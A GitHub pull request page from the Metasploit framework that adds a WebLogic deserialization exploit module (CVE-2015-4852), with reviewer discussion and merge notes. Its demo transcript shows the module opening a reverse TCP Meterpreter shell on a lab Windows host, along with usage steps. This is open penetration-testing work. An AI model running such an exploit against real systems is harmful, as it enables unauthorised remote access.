Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add Weblogic_serialize_rawobject CVE-2015-4852 #11131

Merged
merged 11 commits into from
Mar 26, 2019
Merged

Add Weblogic_serialize_rawobject CVE-2015-4852 #11131

merged 11 commits into from
Mar 26, 2019

Conversation

acamro
Copy link
Contributor

@acamro acamro commented Dec 16, 2018
edited
Loading

Hi everyone,
Please, add this exploit module for CVE-2015-4852, Oracle Weblogic Deserialization Vulnerability,
It was tested on Windows 7 x64 with Oracle Weblogic Server v10.3.6.0 and v12.1.3.0

TODO

Test on Linux
Test on Solaris
Improve the documentation

DEMO

 msf exploit(multi/misc/weblogic_deserialize_rawobject) > set rhost 192.168.192.6
 rhost => 192.168.192.6
 msf exploit(multi/misc/weblogic_deserialize_rawobject) > set rport 7001
 rport => 7001
 msf exploit(multi/misc/weblogic_deserialize_rawobject) > exploit
 [*] Started reverse TCP handler on 192.168.192.136:4444 
 [*] 192.168.192.6:7001 - Sending handshake...
 [*] 192.168.192.6:7001 - Sending T3 request object...
 [*] 192.168.192.6:7001 - Sending client object payload...
 [*] Sending stage (179779 bytes) to 192.168.192.6
 [*] Meterpreter session 7 opened (192.168.192.136:4444 -> 192.168.192.6:49266) at 2018-12-14 11:40:29 -0800
 
 meterpreter > sysinfo
 Computer        : GIOTTO-HS-W7
 OS              : Windows 7 (Build 7600).
 Architecture    : x64
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows

Verification

  • Start msfconsole
  • use exploit/multi/misc/weblogic_deserialize_rawobject
  • set rhost
  • set rport
  • exploit
  • Enjoy!!!

bcoles and others added 4 commits December 15, 2018 23:23
@bcoles @acamro
Update modules/exploits/multi/misc/weblogic_deserialize_rawobject.rb
8dfd8aa 
Co-Authored-By: acamro <acamro@users.noreply.github.com>
@bcoles @acamro
Update modules/exploits/multi/misc/weblogic_deserialize_rawobject.rb
4c14642 
Co-Authored-By: acamro <acamro@users.noreply.github.com>
@bcoles @acamro
Update documentation/modules/exploit/multi/misc/weblogic_deserialize_…
3d3cf83 
…rawobject.md

Co-Authored-By: acamro <acamro@users.noreply.github.com>
@acamro
Some improvements in code and documentation.
8ce7643
@bcoles
Copy link
Contributor

bcoles commented Dec 16, 2018

There's currently a PR #11125 open to deal with automatically generating YSOserial payloads. Unfortunately I'm not sure if it will land any time soon.

Generally, in instances where there's giant blobs of serialized data, it's nice to have accompanying comments which describe the commands used to generate the blob.

@acamro
Copy link
Contributor Author

acamro commented Dec 16, 2018

There's currently a PR #11125 open to deal with automatically generating YSOserial payloads. Unfortunately I'm not sure if it will land any time soon.

Generally, in instances where there's giant blobs of serialized data, it's nice to have accompanying comments which describe the commands used to generate the blob.

I've added additional comments to the serialized blobs for clarity.
I'll be aware of any other improvement, I'm going to update the other PR soon...
Thanks for your support @bcoles

@wchen-r7
Copy link
Contributor

@bcoles @acamro PR #11125 has been having some issues so it won't be a blocker for this PR.

@asoto-r7 asoto-r7 mentioned this pull request Feb 20, 2019
Merged
6 tasks
@asoto-r7
Copy link
Contributor

@acamro : Please see my comment in the other PR: #11134 (comment). Thanks!!

@asoto-r7 asoto-r7 merged commit 0f9a796 into rapid7:master Mar 26, 2019
asoto-r7 added a commit that referenced this pull request Mar 26, 2019
@asoto-r7
Land #11131, Weblogic_serialize_rawobject CVE-2015-4852
385cfd6
@asoto-r7
Copy link
Contributor

asoto-r7 commented Mar 26, 2019
edited by gdavidson-r7
Loading

Release Notes

The multi/misc/weblogic_deserialize_rawobject exploit module has been added to the framework. This exploit leverages a JSO deserialization vulnerability against Oracle WebLogic v10.3.6.0 and v12.1.3.0.

msjenkins-r7 pushed a commit that referenced this pull request Mar 26, 2019
@asoto-r7 @msjenkins-r7
Land #11131, Weblogic_serialize_rawobject CVE-2015-4852
c2b4cfa
asoto-r7 added a commit to asoto-r7/metasploit-framework that referenced this pull request Mar 26, 2019
@asoto-r7
Fix a git error when landing rapid7#11131, in which I confused two PRs
6c8c005 
While landing PR rapid7#11131, I overwrote weblogic_deserialize_rawobject.rb with
weblogic_deserialize_unicastref.rb, destroying my changes and introducing
a great deal of confusion.
asoto-r7 added a commit to asoto-r7/metasploit-framework that referenced this pull request Mar 26, 2019
@asoto-r7
Fix a git error when landing rapid7#11131, in which I confused two PRs
731da76 
While landing PR rapid7#11131, I overwrote weblogic_deserialize_rawobject.rb with
weblogic_deserialize_unicastref.rb, destroying my changes and introducing
a great deal of confusion.
asoto-r7 added a commit to asoto-r7/metasploit-framework that referenced this pull request Mar 26, 2019
@asoto-r7
Fix a git snafu when landing rapid7#11131
3995321 
While landing PR rapid7#11131, I tripped over my own shoelaces and overwrote `weblogic_deserialize_rawobject.rb` with `weblogic_deserialize_unicastref.rb`, destroying my changes and introducing a great deal of confusion.

This PR gets us back to where we should have been, with rapid7#11131 landed and a few changes to add randomization and expanding on the T3 protocol.
@asoto-r7 asoto-r7 mentioned this pull request Mar 26, 2019
Merged
@gdavidson-r7 gdavidson-r7 added rn-new-modules rn-modules release notes for new or majorly enhanced modules labels Apr 2, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bcoles bcoles bcoles left review comments

Assignees

@asoto-r7 asoto-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
5 participants
@acamro @bcoles @wchen-r7 @asoto-r7 @gdavidson-r7